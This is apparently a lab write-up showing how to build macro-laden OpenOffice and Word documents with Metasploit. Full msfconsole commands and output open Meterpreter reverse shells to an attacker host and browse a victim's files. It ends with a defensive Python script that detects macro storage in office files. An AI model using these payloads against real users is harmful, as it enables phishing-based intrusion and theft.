Creating the macros and demonstrating the exploit

In this section we detail how to create/generate the document that carries the macro, and we show what happens when the document is opened. Sending it through Roundcube, and recovering the Roundcube passwords, are not covered here.

OpenOffice

GIF version: windows.gif (animated capture, not reproduced in this extract)

Creating the macro

  • Command list
use exploit/multi/misc/openoffice_document_macro
set payload windows/meterpreter/reverse_tcp
set target 0
set srvhost 192.168.2.21
set lhost 192.168.2.21
set body "Document  covid"
exploit
  • Demonstration
msf6 > use exploit/multi/misc/openoffice_document_macro

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(multi/misc/openoffice_document_macro) > set target 0
target => 0

msf6 exploit(multi/misc/openoffice_document_macro) > set srvhost 192.168.2.21
srvhost => 192.168.2.21

msf6 exploit(multi/misc/openoffice_document_macro) > set lhost 192.168.2.21
lhost => 192.168.2.21
msf6 exploit(multi/misc/openoffice_document_macro) > set body "Document  covid"
body => Document  covid
msf6 exploit(multi/misc/openoffice_document_macro) > info

       Name: Apache OpenOffice Text Document Malicious Macro Execution
     Module: exploit/multi/misc/openoffice_document_macro
   Platform: 
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-02-08

Provided by:
  sinn3r <sinn3r@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Apache OpenOffice on Windows (PSH)
  1   Apache OpenOffice on Linux/OSX (Python)

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  BODY      Document  covid  no        The message for the document body
  FILENAME  msf.odt          yes       The OpoenOffice Text document name
  SRVHOST   192.168.2.21     yes       The local host or network interface to listen on. This must be an address on
                                       the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT   8080             yes       The local port to listen on.
  SSL       false            no        Negotiate SSL for incoming connections
  SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                    no        The URI to use for this exploit (default is random)

Payload information:

Description:
  This module generates an Apache OpenOffice Text Document with a 
  malicious macro in it. To exploit successfully, the targeted user 
  must adjust the security level in Macro Security to either Medium or 
  Low. If set to Medium, a prompt is presented to the user to enable 
  or disable the macro. If set to Low, the macro can automatically run 
  without any warning. The module also works against LibreOffice.

References:
  https://en.wikipedia.org/wiki/Macro_virus

msf6 exploit(multi/misc/openoffice_document_macro) > exploit 
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/openoffice_document_macro) > 
[*] Started reverse TCP handler on 192.168.2.21:4444 
[*] Using URL: http://192.168.2.21:8080/a7g0tk9gR
[*] Server started.
[*] Generating our odt file for Apache OpenOffice on Windows (PSH)...
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic/Standard
[*] Packaging file: Basic/Standard/Module1.xml
[*] Packaging file: Basic/Standard/script-lb.xml
[*] Packaging file: Basic/script-lc.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2/accelerator
[*] Packaging file: Configurations2/accelerator/current.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/META-INF
[*] Packaging file: META-INF/manifest.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Thumbnails
[*] Packaging file: Thumbnails/thumbnail.png
[*] Packaging file: content.xml
[*] Packaging file: manifest.rdf
[*] Packaging file: meta.xml
[*] Packaging file: mimetype
[*] Packaging file: settings.xml
[*] Packaging file: styles.xml
[+] msf.odt stored at /home/kali/.msf4/local/msf.odt
msf6 exploit(multi/misc/openoffice_document_macro) > jobs

Jobs
====

  Id  Name                                           Payload                          Payload opts
  --  ----                                           -------                          ------------
  0   Exploit: multi/misc/openoffice_document_macro  windows/meterpreter/reverse_tcp  tcp://192.168.2.21:4444

msf6 exploit(multi/misc/openoffice_document_macro) > [*] 192.168.2.14 - Meterpreter session 2 closed.  Reason: Died
jobs
[*] 192.168.2.14     openoffice_document_macro - Sending payload
[*] Sending stage (175686 bytes) to 192.168.2.14
[*] Meterpreter session 3 opened (192.168.2.21:4444 -> 192.168.2.14:50135) at 2022-09-13 06:48:15 -0400

Sending the macro

Detailed here

Exploit


msf6 exploit(multi/misc/openoffice_document_macro) > sessions

Active sessions
===============

  Id  Name  Type                     Information         Connection
  --  ----  ----                     -----------         ----------
  3         meterpreter x86/windows  EPITAF\Hugo @ PC01  192.168.2.21:4444 -> 192.168.2.14:50135 (192.168.2.14)

msf6 exploit(multi/misc/openoffice_document_macro) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > ls
Listing: C:\Program Files (x86)\OpenOffice 4\program
====================================================

Mode              Size      Type  Last modified              Name
----              ----      ----  -------------              ----
100666/rw-rw-rw-  3162112   fil   2022-07-01 23:45:00 -0400  CoinMP.dll
[...]
100666/rw-rw-rw-  229888    fil   2022-07-01 23:45:04 -0400  xsltdlg.dll
100666/rw-rw-rw-  115712    fil   2022-07-01 23:45:04 -0400  xsltfilter.dll
100666/rw-rw-rw-  396800    fil   2022-07-01 23:45:04 -0400  xstor.dll

meterpreter > cd ~
[-] stdapi_fs_chdir: Operation failed: The system cannot find the file specified.
meterpreter > cd /
meterpreter > ls
Listing: C:\
============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
040777/rwxrwxrwx  4096   dir   2022-02-23 03:55:04 -0500  $Recycle.Bin
040777/rwxrwxrwx  0      dir   2022-08-31 11:52:29 -0400  $WinREAgent
040777/rwxrwxrwx  0      dir   2022-02-18 17:44:15 -0500  Documents and Settings
000000/---------  0      fif   1969-12-31 19:00:00 -0500  DumpStack.log.tmp
040777/rwxrwxrwx  0      dir   2019-12-07 04:14:52 -0500  PerfLogs
040555/r-xr-xr-x  8192   dir   2022-09-14 05:38:50 -0400  Program Files
040555/r-xr-xr-x  4096   dir   2022-09-14 05:57:39 -0400  Program Files (x86)
040777/rwxrwxrwx  4096   dir   2022-09-14 05:29:18 -0400  ProgramData
040777/rwxrwxrwx  0      dir   2022-03-12 13:17:34 -0500  Recovery
040777/rwxrwxrwx  12288  dir   2022-03-10 16:50:25 -0500  System Volume Information
040555/r-xr-xr-x  4096   dir   2022-02-26 10:59:34 -0500  Users
040777/rwxrwxrwx  16384  dir   2022-08-31 18:29:28 -0400  Windows
000000/---------  0      fif   1969-12-31 19:00:00 -0500  pagefile.sys
000000/---------  0      fif   1969-12-31 19:00:00 -0500  swapfile.sys

meterpreter > cd Users\\
meterpreter > ls
Listing: C:\Users
=================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
040777/rwxrwxrwx  8192   dir   2022-07-01 14:36:53 -0400  Administrateur
040777/rwxrwxrwx  0      dir   2019-12-07 04:30:39 -0500  All Users
040555/r-xr-xr-x  8192   dir   2022-07-01 14:36:53 -0400  Default
040777/rwxrwxrwx  0      dir   2019-12-07 04:30:39 -0500  Default User
040777/rwxrwxrwx  12288  dir   2022-09-03 05:26:20 -0400  Hugo
040777/rwxrwxrwx  8192   dir   2022-02-26 10:59:25 -0500  MyAdmin
040777/rwxrwxrwx  8192   dir   2022-03-04 14:29:33 -0500  PC01
040555/r-xr-xr-x  4096   dir   2022-02-18 17:46:26 -0500  Public
100666/rw-rw-rw-  174    fil   2019-12-07 04:12:42 -0500  desktop.ini

meterpreter > cd Hugo\\
meterpreter > ls
Listing: C:\Users\Hugo
======================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
040777/rwxrwxrwx  0        dir   2022-09-03 05:26:21 -0400  .ssh
040555/r-xr-xr-x  0        dir   2022-02-22 04:32:39 -0500  3D Objects
040777/rwxrwxrwx  0        dir   2022-02-22 04:31:56 -0500  AppData
[...]
040777/rwxrwxrwx  0        dir   2022-02-22 04:31:56 -0500  Voisinage d'impression
040777/rwxrwxrwx  0        dir   2022-02-22 04:31:56 -0500  Voisinage réseau
100666/rw-rw-rw-  1150976  fil   2022-02-22 04:31:56 -0500  ntuser.dat.LOG1
100666/rw-rw-rw-  2531328  fil   2022-02-22 04:31:56 -0500  ntuser.dat.LOG2
100666/rw-rw-rw-  20       fil   2022-02-22 04:31:56 -0500  ntuser.ini

Microsoft Office Word

GIF version: windows.gif (animated capture, not reproduced in this extract)

Creating the macro

  • List of commands to run in msfconsole
use exploit/multi/fileformat/office_word_macro
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.2.21
exploit
handler -p windows/meterpreter/reverse_tcp -H 192.168.2.21 -P 4444
  • Demonstration
msf6 > use exploit/multi/fileformat/office_word_macro
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(multi/fileformat/office_word_macro) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/fileformat/office_word_macro) > set lhost 192.168.2.21
lhost => 192.168.2.21
msf6 exploit(multi/fileformat/office_word_macro) > exploit

[*] Using template: /usr/share/metasploit-framework/data/exploits/office_word_macro/template.docx
[*] Injecting payload in document comments
[*] Injecting macro and other required files in document
[*] Finalizing docm: msf.docm
[+] msf.docm stored at /home/kali/.msf4/local/msf.docm

Sending the macro

Detailed here

Exploit

handler -p windows/meterpreter/reverse_tcp -H 192.168.2.21 -P 4444

We wait for the following to appear; it means the file has been opened and our exploit has connected back:

msf6 exploit(multi/fileformat/office_word_macro) > 
[*] Sending stage (175686 bytes) to 192.168.2.14
[*] Meterpreter session 1 opened (192.168.2.21:4444 -> 192.168.2.14:49350) at 2022-09-26 04:48:25 -0400

From there on, we can have fun.

msf6 exploit(multi/fileformat/office_word_macro) > sessions

Active sessions
===============

  Id  Name  Type                     Information         Connection
  --  ----  ----                     -----------         ----------
  1         meterpreter x86/windows  EPITAF\Hugo @ PC01  192.168.2.21:4444 -> 192.168.2.14:49350 (192.168.2.14)

msf6 exploit(multi/fileformat/office_word_macro) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls
Listing: C:\Users\Hugo\Documents\macros_script
==============================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100666/rw-rw-rw-  1524212  fil   2022-09-14 05:47:28 -0400  capture_wireshark.pcapng
100666/rw-rw-rw-  85485    fil   2022-09-26 03:37:25 -0400  msf.docm
100666/rw-rw-rw-  7717     fil   2022-09-17 17:56:57 -0400  msf.odt
100666/rw-rw-rw-  162      fil   2022-09-26 03:37:46 -0400  ~$msf.docm
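Both documents generated above (msf.odt and msf.docm) are ZIP containers, which lets a defender check a file for embedded macro code without opening it in an office suite, whatever the macro security level is set to: an ODF document keeps Basic macros under Basic/ (the Module1.xml, script-lb.xml and script-lc.xml entries packaged in the OpenOffice run above), while a .docm keeps VBA in word/vbaProject.bin and declares a macroEnabled part in [Content_Types].xml. The following Python script is an added example, not part of this write-up or of Metasploit; the three sample documents it scans are constructed in memory and contain only the container entries a macro-bearing document would have, no macro code, and the entry names and content-type string it looks for are the standard ones for the two formats.

```python
"""Scan ZIP-based office documents (.odt, .docm, .docx) for embedded macros.

The decision is made from the container contents, never from the file
extension, so a macro-enabled document renamed to .docx is still flagged.
Sample documents below are constructed in memory for the demonstration.
"""
import io
import zipfile

# ODF stores Basic macros under Basic/ (library container, library, modules).
ODF_MACRO_PREFIX = "Basic/"
# OOXML stores VBA in an OLE stream named vbaProject.bin (word/, xl/, ppt/).
OOXML_VBA_NAME = "vbaProject.bin"
# Macro-enabled OOXML parts carry a "...macroEnabled..." content type.
OOXML_MACRO_CT = "macroEnabled"


def find_macro_indicators(data: bytes) -> dict:
    """Return the macro-related evidence found inside a ZIP-based document.

    Keys: 'format' ('odf', 'ooxml' or 'unknown', decided from the container),
    'entries' (archive members holding macro code) and
    'content_types_macro_enabled' (OOXML only).
    """
    result = {"format": "unknown", "entries": [],
              "content_types_macro_enabled": False}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return result  # not a ZIP container: nothing to inspect here
    names = zf.namelist()
    if "mimetype" in names:
        result["format"] = "odf"
    elif "[Content_Types].xml" in names:
        result["format"] = "ooxml"
    for name in names:
        if name.startswith(ODF_MACRO_PREFIX) and not name.endswith("/"):
            result["entries"].append(name)
        elif name.rsplit("/", 1)[-1] == OOXML_VBA_NAME:
            result["entries"].append(name)
    if "[Content_Types].xml" in names:
        ct = zf.read("[Content_Types].xml").decode("utf-8", "replace")
        result["content_types_macro_enabled"] = OOXML_MACRO_CT in ct
    return result


def has_macros(data: bytes) -> bool:
    """True when the container carries macro storage or a macro-enabled part."""
    r = find_macro_indicators(data)
    return bool(r["entries"]) or r["content_types_macro_enabled"]


def _build_zip(members: dict) -> bytes:
    """Constructed helper: build an in-memory ZIP from {name: text}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, text in members.items():
            zf.writestr(name, text)
    return buf.getvalue()


# Constructed samples: same entry layout as the generated documents, no code.
SAMPLE_ODT = _build_zip({
    "mimetype": "application/vnd.oasis.opendocument.text",
    "content.xml": "<office:document-content/>",
    "META-INF/manifest.xml": "<manifest:manifest/>",
    "Basic/script-lc.xml": "<library:libraries/>",
    "Basic/Standard/script-lb.xml": "<library:library/>",
    "Basic/Standard/Module1.xml": "<script:module/>",
})
SAMPLE_DOCM = _build_zip({
    "[Content_Types].xml": '<Types><Override PartName="/word/document.xml" '
    'ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/></Types>',
    "word/document.xml": "<w:document/>",
    "word/vbaProject.bin": "\xd0\xcf\x11\xe0",
})
SAMPLE_DOCX = _build_zip({
    "[Content_Types].xml": '<Types><Override PartName="/word/document.xml" '
    'ContentType="application/vnd.openxmlformats-officedocument'
    '.wordprocessingml.document.main+xml"/></Types>',
    "word/document.xml": "<w:document/>",
})


def scan_samples() -> dict:
    """Scan the constructed samples; returns {label: has_macros}."""
    return {label: has_macros(data) for label, data in
            (("odt", SAMPLE_ODT), ("docm", SAMPLE_DOCM), ("docx", SAMPLE_DOCX))}


if __name__ == "__main__":
    for label, data in (("odt", SAMPLE_ODT), ("docm", SAMPLE_DOCM),
                        ("docx", SAMPLE_DOCX)):
        print(label, find_macro_indicators(data))
```

On a real mail gateway or file share the same function would be applied to the attachment bytes; a hit on either indicator is enough to quarantine the file for review, since a legitimate document rarely needs Basic or VBA storage.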